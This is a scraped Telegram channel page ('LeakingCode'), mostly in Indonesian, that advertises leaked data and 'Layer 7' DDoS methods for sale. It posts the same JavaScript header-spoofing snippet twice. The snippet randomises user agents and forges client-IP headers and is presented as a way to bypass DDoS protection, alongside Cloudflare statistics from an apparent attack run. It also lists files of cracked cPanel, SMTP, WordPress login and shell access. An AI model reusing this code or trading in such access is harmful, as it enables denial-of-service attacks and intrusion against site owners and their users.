es
Feedback
LeakingCode | LC On Top!

LeakingCode | LC On Top!

Ir al canal en Telegram

On this channel we leak data. The data that was leaked included various types of data ranging from general data to prohibited data and other similar things Channel Created By @Lintar21

Mostrar más
1 757
Suscriptores
Sin datos24 horas
Sin datos7 días
+1730 días
Archivo de publicaciones
SELL METHODS CPM AJAH

Zʏɴxᴢᴏᴏᴠᴠɪᴘ V9.0(1).zip13.66 MB

gax mau gax di jdiin atmin

Bantu join ges @LIServiceOthers

Repost from LIService Others
Lestgo 500Subs

function getRandomIP() {
    return (
        Math.floor(Math.random() * 256) + "." +
        Math.floor(Math.random() * 256) + "." +
        Math.floor(Math.random() * 256) + "." +
        Math.floor(Math.random() * 256)
    );
}

function getRandomUserAgent() {
    const userAgents = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:89.0) Gecko/20100101 Firefox/89.0",
        "Mozilla/5.0 (Linux; Android 10; Pixel 3 XL Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Mobile Safari/537.36"
    ];
    return userAgents[Math.floor(Math.random() * userAgents.length)];
}

let spoofedIP = getRandomIP();
let headers = {};

headers[":method"] = "GET"; 

// Target Path and Scheme
headers[":path"] = parsedTarget.path;// sesuaikan target di sinj
headers[":scheme"] = "https";

// Normal Headers
headers["Origin"] = parsedTarget.host;// sesuaikan target di sinj
headers["Referer"] = parsedTarget.host;
headers["User-Agent"] = getRandomUserAgent();
headers["Accept-Encoding"] = "gzip, deflate, br";
headers["Accept-Language"] = "en-US,en;q=0.9";
headers["Cache-Control"] = "no-cache";
headers["Pragma"] = "no-cache";
headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8";
headers["Connection"] = "keep-alive";
headers["Cookie"] = "session=abc123; other_cookie=value";

// Spoofing Random IP
headers["X-Forwarded-For"] = spoofedIP;
headers["X-Forwarded-Host"] = spoofedIP;
headers["Client-IP"] = spoofedIP;
headers["Real-IP"] = spoofedIP;
headers["Via"] = "1.1 " + spoofedIP;

// Cross-Origin Headers (CORS-related headers)
headers["Access-Control-Allow-Origin"] = "*";
headers["Access-Control-Allow-Headers"] = "Content-Type, Authorization";

// Miscellaneous Headers
headers["X-Requested-With"] = "XMLHttpRequest";
headers["Upgrade-Insecure-Requests"] = "1";
headers["Content-Security-Policy"] = "default-src 'self'";
headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains; preload";

// websocket header (kalau targetnya support)
headers["Sec-WebSocket-Key"] = "dGhlIHNhbXBsZSBub25jZQ==";
headers["Sec-WebSocket-Version"] = "13";
headers["Upgrade"] = "websocket";
Katanya headers simple buat bypass http ddos

👑 CloudFlare 👑

🦄 Total Count:

 All Request
 ➥ 131173
 
 Request Successful
 ➥ 100373 (76.52 %)
 
 Request Blocked
 ➥ 30800 (23.48 %)
➖➖➖➖➖➖➖


🔫 Allowed Request:
➖➖➖➖➖➖➖
 ➥ HTTP Protocol: HTTP/2
 ➥ HTTP ResponseStatus: 200
 ➥ Count: 100373
➖➖➖➖➖➖➖

 ➥ Count: 100373
 ➥ Percentage: 76.52 %
➖➖➖➖➖➖➖

🚁 Bypassed Request:
➖➖➖➖➖➖➖

 ➥ Count: 0
 ➥ Percentage: 0.00 %
➖➖➖➖➖➖➖

🛡 Blocked Request:
➖➖➖➖➖➖➖
 ➥ Count: 30747
 ➥ Action: Block
 ➥ RequestHTTPMethod: GET
 ➥ RequestHTTPProtocol: HTTP/2
 ➥ RequestScheme: https
 ➥ ResponseStatus: 403
 ➥ Trigger Rules: HTTP DDos
➖➖➖➖➖➖➖
 ➥ Count: 42
 ➥ Action: Managed Challenge
 ➥ RequestHTTPMethod: GET
 ➥ RequestHTTPProtocol: HTTP/2
 ➥ RequestScheme: https
 ➥ ResponseStatus: 403
 ➥ Trigger Rules: Security Level
➖➖➖➖➖➖➖
 ➥ Count: 11
 ➥ Action: Managed Challenge
 ➥ RequestHTTPMethod: GET
 ➥ RequestHTTPProtocol: HTTP/1.1
 ➥ RequestScheme: https
 ➥ ResponseStatus: 403
 ➥ Trigger Rules: Security Level
➖➖➖➖➖➖➖

 ➥ Count: 30800
 ➥ Percentage: 23.48 %
➖➖➖➖➖➖➖

You are not currently in an invisible state, the statistics will be displayed in the leaderboard according to the ranking of the data
Thanks for using this service
🚗 Data from user: Lintar 🚗

working_smtp.txt0.36 KB

+5
200 shells.txt0.12 KB

CPANEL.txt0.31 KB

wpsec.py0.02 KB

good plesk.txt0.08 KB

working_smtp.txt0.13 KB

SUCCES WP-LOGIN.txt2.54 KB

377 Successfully_logged_Cpanels.txt0.22 KB

function getRandomIP() {
    return (
        Math.floor(Math.random() * 256) + "." +
        Math.floor(Math.random() * 256) + "." +
        Math.floor(Math.random() * 256) + "." +
        Math.floor(Math.random() * 256)
    );
}

function getRandomUserAgent() {
    const userAgents = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:89.0) Gecko/20100101 Firefox/89.0",
        "Mozilla/5.0 (Linux; Android 10; Pixel 3 XL Build/QP1A.190711.020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Mobile Safari/537.36"
    ];
    return userAgents[Math.floor(Math.random() * userAgents.length)];
}

let spoofedIP = getRandomIP();
let headers = {};

headers[":method"] = "GET"; 

// Target Path and Scheme
headers[":path"] = parsedTarget.path;// sesuaikan target di sinj
headers[":scheme"] = "https";

// Normal Headers
headers["Origin"] = parsedTarget.host;// sesuaikan target di sinj
headers["Referer"] = parsedTarget.host;
headers["User-Agent"] = getRandomUserAgent();
headers["Accept-Encoding"] = "gzip, deflate, br";
headers["Accept-Language"] = "en-US,en;q=0.9";
headers["Cache-Control"] = "no-cache";
headers["Pragma"] = "no-cache";
headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8";
headers["Connection"] = "keep-alive";
headers["Cookie"] = "session=abc123; other_cookie=value";

// Spoofing Random IP
headers["X-Forwarded-For"] = spoofedIP;
headers["X-Forwarded-Host"] = spoofedIP;
headers["Client-IP"] = spoofedIP;
headers["Real-IP"] = spoofedIP;
headers["Via"] = "1.1 " + spoofedIP;

// Cross-Origin Headers (CORS-related headers)
headers["Access-Control-Allow-Origin"] = "*";
headers["Access-Control-Allow-Headers"] = "Content-Type, Authorization";

// Miscellaneous Headers
headers["X-Requested-With"] = "XMLHttpRequest";
headers["Upgrade-Insecure-Requests"] = "1";
headers["Content-Security-Policy"] = "default-src 'self'";
headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains; preload";

// websocket header (kalau targetnya support)
headers["Sec-WebSocket-Key"] = "dGhlIHNhbXBsZSBub25jZQ==";
headers["Sec-WebSocket-Version"] = "13";
headers["Upgrade"] = "websocket";
Katanya headers simple buat bypass http ddos

Apasih Yatmemek

SELL METHODS LAYER 7 PRICE ? DM ME Buy? Click Here

Gay man IrassGanz

SELL METHODS LAYER 7 PRICE DM ME Buy ? Click Here